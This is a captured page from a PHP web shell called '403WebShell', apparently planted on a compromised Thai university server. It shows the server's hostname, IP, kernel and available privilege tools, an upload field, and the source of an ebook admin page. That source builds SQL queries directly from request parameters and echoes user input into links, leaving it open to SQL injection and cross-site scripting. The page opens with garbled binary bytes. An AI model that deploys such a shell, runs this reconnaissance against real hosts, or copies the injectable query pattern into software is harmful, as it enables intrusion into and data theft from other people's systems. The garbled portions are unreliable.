403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/www/html/culture/ebook/pages/admin/

Upload File :

[ Back ]

Current File : /var/www/html/culture/ebook/pages/admin/index.php

<?php include 'check_mode_admin.php';?>
<?php include '../dbconnect.php';?>
<?php include 'header.php';?>

<?php
function MonthThai($strMonth)
{
	$strMonthName = Array("","มกราคม","กุมภาพันธ์","มีนาคม","เมษายน","พฤษภาคม","มิถุนายน","กรกฎาคม","สิงหาคม","กันยายน","ตุลาคม","พฤศจิกายน","ธันวาคม");
	$strMonthThai=$strMonthName[$strMonth];
	return $strMonthThai;
}

	$type_code = (isset($_GET["type_code"])) ? $_GET["type_code"] : '';
	$strKeyword = null;
	if(isset($_POST["txtKeyword"]))
	{
		$strKeyword = $_POST["txtKeyword"];
	}
	if(isset($_GET["txtKeyword"]))
	{
		$strKeyword = $_GET["txtKeyword"];
	}
	if($strKeyword<>"") {
		$pagetitle_text = "ผลการค้นหา " . $strKeyword;;
	} elseif($type_code<>"") {
		$sql = "SELECT * from type WHERE type_code=" . $type_code;
		$query = mysqli_query($conn,$sql);
		if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {	
			$pagetitle_text = "รายชื่อ" . $result["type_name"];
		} else {
			$pagetitle_text = "รายชื่อหนังสือทั้งหมด";	
		}
	} else {
		$pagetitle_text = "รายชื่อหนังสือทั้งหมด";		
	}
?>
	  
	<h3 class="page-header"><?php echo $pagetitle_text;?>&nbsp;&nbsp;&nbsp;<a href="index.php"><button type="button" class="btn btn-primary">คลิกที่นี่เพื่อดูหนังสือทั้งหมด</button></a></h3>	
<?php
	$strKeyword = null;

	if(isset($_POST["txtKeyword"]))
	{
		$strKeyword = $_POST["txtKeyword"];
	}
	if(isset($_GET["txtKeyword"]))
	{
		$strKeyword = $_GET["txtKeyword"];
	}
	$sql = "SELECT * FROM title";
	if($strKeyword<>"") {
		$sql .= " WHERE ( (title_name LIKE '%" . $strKeyword . "%')";
		$sql .= " OR (author LIKE '%" . $strKeyword . "%')";
		$sql .= " OR (detail LIKE '%" . $strKeyword . "%') )";
	} elseif($type_code<>"") {
		$sql .= " WHERE type_code=" . $type_code;
	}
	$sql .= " ORDER BY title_code DESC";
	$query = mysqli_query($conn,$sql);
	$num_rows = mysqli_num_rows($query);
	$per_page = 20;   // Per Page
	$page  = 1;
	if(isset($_GET["Page"]))
	{
		$page = $_GET["Page"];
	}
	$prev_page = $page-1;
	$next_page = $page+1;
	$row_start = (($per_page*$page)-$per_page);
	if($num_rows<=$per_page) {
		$num_pages =1;
	} elseif(($num_rows % $per_page)==0) { //if($num_rows<=$per_page) {
		$num_pages =($num_rows/$per_page) ;
	} else { //if($num_rows<=$per_page) {
		$num_pages =($num_rows/$per_page)+1;
		$num_pages = (int)$num_pages;
	} //if($num_rows<=$per_page) {
	$row_end = $per_page;
	$sql .= " LIMIT $row_start ,$row_end";
	$query = mysqli_query($conn,$sql);
?>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr bgcolor="#6699FF">
										<th><div align="center">title_code</div></th>
										<th><div align="center">รูปภาพ</div></th>
                                        <th><div align="center">ชื่อเรื่อง</div></th>
										<th><div align="center">ชื่อผู้แต่ง</div></th>
                                        <th><div align="center">ประเภท</div></th>
                                        </tr>
                                    </thead>
                                <tbody>
<?php
	while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
?>
                                    <tr>
										<td><a href="title_detail.php?title_code=<?php echo $result["title_code"];?>"><?php echo $result["title_code"];?></a></td>
<?php
										if($result["picture"]<>"") {
											$picture_url = "../titlepicture/" . $result["picture"];
										} else { //if($result["picture"]<>"") {
											$picture_url = "../titlepicture/" . "nopic.gif";
										} //if($result["picture"]<>"") {
?>  
										<td width="10%"><a href="<?php echo $picture_url;?>" target="_blank"><img src="<?php echo $picture_url;?>" width="90%" class="img-fluid"></a></td>
										<td><a href="title_detail.php?title_code=<?php echo $result["title_code"];?>"><?php echo $result["title_name"];?></a></td>	
										<td><?php echo $result["author"];?></td>
										<td>
<?php
		$sql2 = "SELECT type_name FROM type WHERE type_code=" . $result["type_code"];
		$query2 = mysqli_query($conn,$sql2);
		if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
			$type_name = $result2["type_name"];
		} else { //if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
			$type_name = "";
		} //if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
?>									
											<?php echo $type_name;?>	
										</td>
                                    </tr>
<?php
	} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
?>									
                                </tbody>
                            </table>
                            <!-- /.table-responsive -->

<br>
Total <?php echo $num_rows;?> Record : <?php echo $num_pages;?> Page :
<?php
	if($prev_page)
	{
		echo " <a href='$_SERVER[SCRIPT_NAME]?Page=$prev_page&txtKeyword=$strKeyword'><< Back</a> ";
	}
	
	for($i=1; $i<=$num_pages; $i++){
		if($i != $page)
		{
			echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword'>$i</a> ]";
		}
		else
		{
			echo "<b> $i </b>";
		}
	}
	if($page!=$num_pages)
	{
		echo " <a href ='$_SERVER[SCRIPT_NAME]?Page=$next_page&txtKeyword=$strKeyword'>Next>></a> ";
	}							
?>


<BR><BR>


<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit